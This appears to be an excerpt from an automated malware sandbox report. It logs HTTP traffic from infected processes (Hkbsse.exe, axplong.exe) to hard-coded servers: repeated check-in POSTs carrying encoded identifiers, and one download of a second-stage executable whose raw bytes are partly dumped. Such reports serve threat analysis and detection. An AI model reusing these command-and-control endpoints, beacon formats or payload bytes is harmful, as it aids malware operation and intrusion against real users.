                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        125192.168.2.559100185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:53.893903017 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:54.702141047 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:54 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        126192.168.2.55910177.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:54.703870058 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000240001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:55.542237997 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        127192.168.2.559102185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:54.716295004 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:55.542222977 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        128192.168.2.559104185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:55.659658909 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:56.316688061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:56 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        129192.168.2.559105185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:56.324697971 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:56.964807034 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:56 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        130192.168.2.559106185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:57.112526894 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:57.769032955 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:57 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        131192.168.2.559107185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:57.778137922 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:58.443319082 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:58 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        132192.168.2.559108185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:58.567071915 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:59.205446959 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:59 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        133192.168.2.559109185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:59.218234062 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:59.860078096 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:08:59 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        134192.168.2.559110185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:08:59.979461908 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:00.628973007 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        135192.168.2.55911177.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:00.475081921 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000240001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.162185907 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        136192.168.2.559112185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:00.638145924 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.278774023 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        137192.168.2.55911377.232.41.110806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.176508904 CEST52OUTGET /large/see.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 77.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885740042 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:01 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 550912
                                                                                                                                                                                                                                        Last-Modified: Fri, 12 Jul 2024 08:28:21 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "6690e925-86800"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 41 fd 6e b8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 ac 02 00 00 ba 05 00 00 00 00 00 de ca 02 00 00 20 00 00 00 e0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ca 02 00 57 00 00 00 00 e0 02 00 62 b6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELAn0 @ @Wb H.text `.rsrcb@@.relocf@BH)EP D~;]1!HNINeFXV:)]"fSZ{fPQAeS~'^:k;EXK0U vmvL%O*5D&bZIg%E]/uLFk_mzRY-t!Xi)IDjuyxX>kq'O f:}Jc1Q3`SEbdwk
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885782003 CEST1236INData Raw: a0 1c fe 08 2b 94 f9 48 68 58 70 45 fd 19 8f de 6c 87 94 7b f8 b7 52 73 d3 23 ab 4b 02 e2 72 1f 8f 57 e3 55 ab 2a 66 eb 28 07 b2 b5 c2 03 2f c5 7b 9a 86 37 08 a5 d3 28 87 f2 30 bf a5 b2 23 03 6a ba 02 16 82 5c ed cf 1c 2b 8a 79 b4 92 a7 07 f2 f0
                                                                                                                                                                                                                                        Data Ascii: +HhXpEl{Rs#KrWU*f(/{7(0#j\+yiNe4b.S4U2u9`@q^nQ!>=>FMT]qoP`$@CwgB[8y|GB|+H2pZrNl8V=
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885799885 CEST1236INData Raw: f6 7b 7b 0d ff f2 f2 bd d6 6b 6b b1 de 6f 6f 54 91 c5 c5 50 60 30 30 03 02 01 01 a9 ce 67 67 7d 56 2b 2b 19 e7 fe fe 62 b5 d7 d7 e6 4d ab ab 9a ec 76 76 45 8f ca ca 9d 1f 82 82 40 89 c9 c9 87 fa 7d 7d 15 ef fa fa eb b2 59 59 c9 8e 47 47 0b fb f0
                                                                                                                                                                                                                                        Data Ascii: {{kkooTP`00gg}V++bMvvE@}}YYGGAg_E#Srr[u=jL&&Zl66A~??O\h44Q4qqsSb11?*ReF##^(07/6$=&iN''uu
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885809898 CEST672INData Raw: b1 5a 49 25 ba 1b 67 45 ea 0e 98 5d fe c0 e1 c3 2f 75 02 81 4c f0 12 8d 46 97 a3 6b d3 f9 c6 03 8f 5f e7 15 92 9c 95 bf 6d 7a eb 95 52 59 da d4 be 83 2d 58 74 21 d3 49 e0 69 29 8e c9 c8 44 75 c2 89 6a f4 8e 79 78 99 58 3e 6b 27 b9 71 dd be e1 4f
                                                                                                                                                                                                                                        Data Ascii: ZI%gE]/uLFk_mzRY-Xt!Ii)DujyxX>k'qO f}:cJ1Q3`bSEdwk+pHhXElR{s#rKWfU*(/{70(#j\+yNie4b4.SU2u9
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885821104 CEST1236INData Raw: 26 78 09 6e 59 18 f4 ec 9a b7 01 83 4f 9a a8 e6 95 6e 65 aa ff e6 7e 21 bc cf 08 ef 15 e8 e6 ba e7 9b d9 4a 6f 36 ce ea 9f 09 d4 29 b0 7c d6 31 a4 b2 af 2a 3f 23 31 c6 a5 94 30 35 a2 66 c0 74 4e bc 37 fc 82 ca a6 e0 90 d0 b0 33 a7 d8 15 f1 04 98
                                                                                                                                                                                                                                        Data Ascii: &xnYOne~!Jo6)|1*?#105ftN73JAP/vMCMMTLj,FeQ^5]tsA.gZRV3mGa7zY<'a5zG<YUs?ys7S_[=oxDh>8$4,@_r
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885885000 CEST1236INData Raw: 6e bd d3 ac ef 43 ac 62 a6 c4 62 91 a8 39 91 95 a4 31 95 e4 37 d3 e4 79 8b f2 79 e7 32 d5 e7 c8 43 8b c8 37 59 6e 37 6d b7 da 6d 8d 8c 01 8d d5 64 b1 d5 4e d2 9c 4e a9 e0 49 a9 6c b4 d8 6c 56 fa ac 56 f4 07 f3 f4 ea 25 cf ea 65 af ca 65 7a 8e f4
                                                                                                                                                                                                                                        Data Ascii: nCbb917yy2C7Yn7mmdNNIllVV%eezzGoxx%oJ%.r\.$8WsQ#|tt!>KKapp>B|>qffHHaa5_j5WWiX':'8+3"iip
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885896921 CEST1236INData Raw: 25 ec 90 73 82 81 b3 0a ce ee ea 72 0b 4e e2 1d 33 b3 a2 c0 01 10 2b 36 8a 60 c7 1f 7d 52 dc 4b 09 36 8a 25 aa 82 9a e2 2a 63 3e 16 ab 4a f9 15 f1 cd b4 1c f4 52 36 86 05 77 c5 6b 3f b4 fa 36 ad 23 d8 e9 f5 be 77 ab 57 49 28 45 63 90 f6 80 ed f5
                                                                                                                                                                                                                                        Data Ascii: %srN3+6`}RK6%*c>JR6wk?6#wWI(EcqY>}[n*"}xYJ4hh,NmK(EVWM)i9EK0|@?0nRnG*kHC!7c<:j9Bc&y;w_
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885915041 CEST1236INData Raw: e3 fc 4d a9 39 53 12 7a cd f5 c3 19 57 7d 55 3e 0b 6f 46 ff 59 29 f9 53 32 e3 e5 82 4f e9 34 8f eb 60 61 43 3e 8e 21 2c 1a 22 70 92 95 24 30 7b cf 79 3a 22 f4 da 89 fb 2c 62 6c ce 08 e6 b3 fc f1 11 ec c2 77 c9 34 7b 33 d8 b4 e4 97 ec 59 bf 15 60
                                                                                                                                                                                                                                        Data Ascii: M9SzW}U>oFY)S2O4`aC>!,"p$0{y:",blw4{3Y`?;2)wx4\38]BnM4l#PI er}01N:hM:{^IgI+o&sqE[Ej)$0*YgDLik-_:zM%:%
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:01.885926008 CEST1236INData Raw: 5e 9e 22 61 76 1f db b4 32 8f 03 f4 94 a9 cc 54 77 11 97 a0 75 e9 ea eb 41 ba b6 7c 18 d1 42 ea e9 ed 4a ea 19 d3 d5 a2 88 06 54 8e 85 a8 12 23 7e e0 52 2c 63 7d 12 2d 64 66 fc 6e 34 25 ca 8a df 07 59 46 22 57 63 1f 50 90 f4 52 a6 8b fd cb cd 51
